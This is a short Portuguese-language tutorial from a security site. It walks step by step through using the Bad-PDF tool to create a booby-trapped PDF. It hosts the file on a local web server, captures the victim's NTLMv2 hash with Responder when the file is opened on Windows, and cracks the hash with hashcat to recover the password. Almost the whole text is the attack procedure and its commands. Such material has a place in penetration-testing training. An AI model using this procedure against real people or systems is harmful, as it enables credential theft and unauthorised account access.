A Bad-PDF é uma ferramenta que permite a criação de um arquivo PDF que assim que é executado pela vítima o atacante conhece realizar a captura do hash NTLM (NTLMv1/NTLMv2) através do Responder.

01 - Passo

Realize o clone do projeto Bad-PDF e lista o conteúdo do diretório.

Linux
git clone https://github.com/deepzec/Bad-Pdf

cd Bad-Pdf/

ls -l

02 - Passo

Execute o script badpdf.py e informe os dados tais como: IP do Atacante, Nome do Arquivo (PDF), Interface de Rede.

Linux
python badpdf.py

Please enter Bad-PDF host IP:
192.168.0.100

Please enter output file name:
100security.pdf

Please enter the inteface name to listen(Default eth0):
eth0

03 - Passo

Aguarde... o Responder será iniciado automaticamente.

04 - Passo

Abra um novo terminal lista o arquivo pdf criado e inicie um serviço web para compartilhar o arquivo 100security.pdf.

Linux
ls -l *.pdf

python -m SimpleHTTPServer 81

05 - Passo

No computador Windows acesse: http://192.168.0.100:81, para visualizar os arquivos.

06 - Passo

Clique no arquivo 100security.pdf.

07 - Passo

Observe que no terminal onde o Responder está em execução é exibido o Hash NTLMv2 do usuário 100SECURITY\marcos.

08 - Passo

Crie um arquivo novo ex: marcos.txt contendo o dado capturado.

Linux
vim marcos.txt

cat marcos.txt

09 - Passo

Utilize o hashcat para tentar descriptografar o hash NTLMv2.

  • Para este exemplo eu criei uma wordlist.txt com diversas senhas, mas você pode utilizar uma lista de sua preferência.
Linux
hashcat -m 5600 marcos.txt wordlist.txt -o senha-marcos.txt --force

Hash Descriptografado.

10 - Passo

Leia o conteúdo do arquivo senha-marcos.txt para visualizar a Senha.

Linux
cat senha-marcos.txt



  Autor

Marcos Henrique

 São Paulo/SP



  Ferramentas de Exploração

© 2021 - 100SECURITY

Contato